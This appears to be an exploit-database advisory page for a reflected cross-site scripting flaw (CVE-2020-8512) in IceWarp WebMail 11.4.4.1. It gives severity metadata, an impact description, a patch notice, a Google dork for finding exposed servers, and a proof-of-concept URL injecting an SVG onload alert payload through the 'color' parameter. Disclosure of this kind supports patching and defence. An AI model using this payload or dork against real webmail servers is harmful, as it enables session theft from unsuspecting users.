header-logo
Suggest Exploit
vendor:
IceWarp WebMail
by:
Lutfu Mert Ceylan
6.1
CVSS
MEDIUM
Reflective Cross-Site Scripting
79
CWE
Product Name: IceWarp WebMail
Affected Version From: 11.4.4.1
Affected Version To: 11.4.4.1
Patch Exists: Yes
Related CWE: CVE-2020-8512
CPE: a:icewarp:icewarp_webmail
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2020

IceWarp WebMail 11.4.4.1 – Reflective Cross-Site Scripting

An attacker can use XSS (in color parameter IceWarp WebMail 11.4.4.1 and before)to send a malicious script to an unsuspecting Admins or users. The end admins or useras browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Even an attacker can easily place users in social engineering through this vulnerability and create a fake field.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of IceWarp WebMail.
Source

Exploit-DB raw data:

# Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting
# Date: 2020-01-27
# Author: Lutfu Mert Ceylan
# Vendor Homepage: www.icewarp.com
# Tested on: Windows 10
# Versions: 11.4.4.1 and before
# Vulnerable Parameter: "color" (Get Method)
# Google Dork: inurl:/webmail/ intext:Powered by IceWarp Server
# CVE: CVE-2020-8512

# Notes:

# An attacker can use XSS (in color parameter IceWarp WebMail 11.4.4.1 and
# before)to send a malicious script to an unsuspecting Admins or users. The
# end admins or useras browser has no way to know that the script should not
# be trusted, and will execute the script. Because it thinks the script came
# from a trusted source, the malicious script can access any cookies, session
# tokens, or other sensitive information retained by the browser and used
# with that site. These scripts can even rewrite the content of the HTML
# page. Even an attacker can easily place users in social engineering through
# this vulnerability and create a fake field.

# PoC:

# Go to Sign-in page through this path: http://localhost/webmail/ or
http://localhost:32000/webmail/

# Add the "color" parameter to the URL and write malicious code, Example:
http://localhost/webmail/?color="><svg/onload=alert(1)>

# When the user goes to the URL, the malicious code is executed

Example Vulnerable URL: http://localhost/webmail/?color=
"><svg/onload=alert(1)>